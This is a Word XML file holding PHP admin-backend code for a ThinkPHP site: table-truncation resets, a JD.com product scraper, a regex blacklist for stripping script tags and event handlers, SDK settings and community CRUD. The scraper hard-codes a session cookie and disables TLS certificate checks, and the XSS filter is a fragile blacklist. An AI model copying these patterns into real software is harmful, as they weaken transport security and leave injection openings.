    <w:p w14:paraId="0BA97D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DA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band");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73338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fangke");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD95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favorite");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D0D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guanzhu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531601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records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E340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pay_record");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5CF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query("truncate table fx_tz_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADE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yaoqing");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D5E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yaoqing_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B10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shoplist_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834E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shoplist");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF2D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qiandao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E1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diaocha_user");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B2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zhibo");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCF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tixian");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D877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records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F406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query("truncate table fx_member_zhibo_liwu_list");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8B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78E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aijiImgList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12810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input('url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB18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tem.jd.com\/(.*?).html/",$url,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64552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1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31264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0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8B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33984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DCF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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF6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73B8EB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html['ware'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1841B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html['wname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AC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images'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089A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str_replace('n0/jfs','n1/s400x400_jfs',$v['bigpath']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16DA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str_replace('!q70.jpg','',$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D44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s[]=$this-&gt;imgUrl($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6533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656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imgs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066DA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html['wdisHtml'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D974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s+/", " ", $str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45596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 ]+/si","&lt;",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215FB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gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053C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gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B39E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html.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1E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div.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EA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a.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6A8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head.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C15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meta.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FC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body.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CFD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link.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06195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form.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F04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cookie/si","COOKIE",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC8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applet.*?)&gt;(.*?)&lt;(\/applet.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E82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applet.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957C9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style.*?)&gt;(.*?)&lt;(\/style.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB27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style.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C80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title.*?)&gt;(.*?)&lt;(\/title.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BB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title.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FC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object.*?)&gt;(.*?)&lt;(\/object.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719B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tr=preg_replace("/&lt;(\/?objec.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60654C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noframes.*?)&gt;(.*?)&lt;(\/noframes.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29232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noframes.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B60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i?frame.*?)&gt;(.*?)&lt;(\/i?frame.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996F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i?frame.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F94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script.*?)&gt;(.*?)&lt;(\/script.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B2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lt;(\/?script.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051EA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javascript/si","Javascript",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46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vbscript/si","Vbscript",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA21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on([a-z]+)\s*=/si","On\\1=",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BD4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preg_replace("/&amp;#/si","&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E200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str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C4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this-&gt;get('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1A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name=\"jdPrice\" value=\"(.*?)\"\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277ABD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oney']=$money['1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE3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484B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094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get($url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0F5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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA1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HTTPHEADER, array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961C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ost:item.m.jd.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FB0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nection: keep-alive",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83A2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pt: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F14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grade-Insecure-Requests: 1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6AF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NT:1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0DC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pt-Language: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30098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okie:JAMCookie=true; __jda=.882330932.1512470771.1512470771.1512470771.0; abtest=20180105154902515_40; mobilev=html5; USER_FLAG_CHECK=9d87ddea2df2d7308a7c613b248569c0; sid=2ad987cecf149a91a4fd89b1b301503f',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B51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D81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USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DE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REFERER,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A74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ENCODING, "gzip, deflate, br");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD4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FOLLOWLOCATION, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF4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URL, $url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E5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TIMEOUT,30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0C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RETURNTRANSFER, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB87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SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BB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SSL_VERIFYHOST, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BF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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DC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h);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D571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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA14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59F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imgUrl($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21F9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ROOT_PATH . 'public/uploads/shopimg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69C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date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DF2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d.'/'.$date.'/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD09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_exists($d)){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A257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kdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797014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BCBD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file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2C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039C6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BF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275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and=rand(10000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D550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s=md5($img).$rand.'.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77D5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d.'/'.$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39E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d,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ACBF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ublic/uploads/shopimg/".$date."/".$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75433A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2DD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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE31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5C15B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w = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D5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header = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52603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Id: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50836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Key: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2F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125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curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3A4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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E8F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RL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC64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CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25446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array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA43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httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29840D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PEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C9A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HOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080E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SERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F5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AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E24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POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A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TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474FA1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EADER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7A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RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB0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line = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D230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url_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F77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no'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B911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369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url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB4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otalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29C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D4D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AppStatisticDataById(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E753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date('Y-m-d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3CF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his-&gt;html('getAppStatisticDataById','POST',['startDate'=&gt;$date,'endDate'=&gt;$date]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9805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json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917A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st'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C933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msg']['0']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724A7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43AD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data['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F37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7D15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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD1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8FD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ED33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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766D5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F0CD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5AA1B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Cache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086005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6C27C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model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B4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Sdk extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F59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4C9C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1BC6E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9D42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3A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emp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4150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config')-&gt;where('type','sdkTemp')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B32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name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01A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A7C5A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FBA74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4F263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name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07973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4F7EE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9C9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7FEF4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AC53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ACF3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775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FB6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D83F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A57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87579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B77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bile(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C5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sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A883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37462B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05DF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6E530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02CB44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4B04AC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0D54B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3AF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7CD62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0FD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5DF548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DC5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0B20F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1A1C30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7320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9B94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D10B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mail(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB1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sdkEmail')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6EE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data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C31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0D226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29291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28F493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49BAC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1C669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41E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26B82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220C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D777A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B272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7EF7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89041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229D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8101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16F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mails(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCF5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B6BD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nd = new Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E03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Send-&gt;email(['email'=&gt;input('post.username'),'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱测试成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9F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ult !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079F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测试失败，原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD41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4DA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gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱测试成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE21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297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DE9E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beecloud(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587CD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sdkBeecloud')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B3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95E14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93EB4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5A558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0335F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49801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52798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4EE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3C890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0ECBD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541B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4CE5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0B05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4D37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948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D8D8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341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qiniu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5513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sdkQiniu')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E670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787F58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87AA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25B19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post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291855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258D6B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gt;$v['name'],'type'=&gt;'sdkQiniu'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FA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041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7929DB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5C63A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0C6B3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F16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643E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6A0A8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66A0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8178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D07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xLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33B8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wxLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24470F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552CB9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FDB8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47023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2CFFF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73D37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gt;$v['name'],'type'=&gt;'wxLogin'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F4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B02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7D5793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D5A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5576CE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DB2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7475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07449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60B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1CEAA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620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qqLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B540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onfig')-&gt;where('type','qqLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD9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CCEE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7BDF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6EA9EE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081F1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2BB332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gt;$v['name'],'type'=&gt;'qqLogin'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149496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5A1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5129BC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939C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97700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546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3502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this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5A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3EC3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BDEBE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5116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0CB7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7F138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4C193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7E45B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33C45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ychannel extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3089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324B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2E766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ychannel')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A98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5888BE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0FC9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9042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4A5EC9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315C5B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F2A1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CA5F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165C2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9714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mychannel')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABAEA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2FB019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轮播图标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0EE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9D3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ychannel')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869C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CAA76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028028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9A20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29118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0031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3267A5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ychannel')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3AC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1E9A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B817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1175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48BF6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38E6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E14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CECE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751F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ychannel')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8C2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26E4CB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25BB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2DA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A782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255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DED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572282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00E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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57739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AD6C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5D354D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0EAC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B21E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FC8F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typeid')-&gt;where('mychannel',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB043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07094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ychannel')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999C3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AFF3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B499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2C4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0AFBC2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771E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8F6B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模型下有栏目，请先删除栏目对应模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8456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BF17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8BA7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4AF4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9FF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BD13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64A7A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3BD3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81BF1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178C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9882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8655E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33DC7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2C940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5EB45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6DE12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71FE38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40BCDA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281D1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ircle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E505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B366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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128E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423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circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9CD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07D3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types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB74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AB69B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751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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A352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D8F3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param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751561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Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050A3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ype_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40998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E0D9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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B320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A33B4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CA576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_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF6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334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301C75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4EDE0E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37D7B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D7B1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35B26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17DC6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 = Db::name('circle_type')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D193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type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAC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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6A1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338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4B726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type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB17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667A4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61106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E724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10113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1EC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5A2769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type')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35141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F7C2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38409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20BF4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3FBFF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4DE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D34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862D7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post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E28F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B3B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129A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37001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Db::name('circle_type')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77A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7B3BE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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44685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2A07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112C5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209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FE4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573AA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761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CC893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DB36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ete_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC4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D87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49A98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19D0E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7F6EB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55A9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count = Db::name('circle')-&gt;where('type_id', $id)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10055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circle_count &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37541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type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55B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555AB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42A454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53D8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1517C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8A8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ABFB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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E66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81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F119E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41EB6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BE3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F662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4D0C7F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54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0355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CBE0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D693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5AA2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circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352688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2245A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type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D4F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 = input('search_name', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308B6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circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70133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 id desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E4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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B7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type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46974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12D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earch_name != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A461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title', 'like', '%' . $search_name . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F0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6BD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query-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C94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12C4D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_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247948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s', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD9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5FEE2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4DB49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5219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122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18BA4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4072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circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AE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 id asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639EC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1727C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s', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D383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aram.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210299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7BD9C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6BDD14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member_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E7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member_id'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3DD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EB85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ype_id'] &lt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20243A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请选择社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D93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866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update_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021B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strtotime($post['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA0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8DB9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3C834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6C0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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D7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ost['content'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27814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ontent'] = htmlspecialchars_decode($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26388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A77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13980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itle']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BE9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_circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D49F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post['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F7A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7A986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_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DB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名称社区已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50743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FE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B60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12486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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D0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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2A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45493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5BA294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7291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4E5B7C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D55A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1EACF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itle']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08273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_circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63029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lt;&gt;', $id)</w:t>
      </w:r>
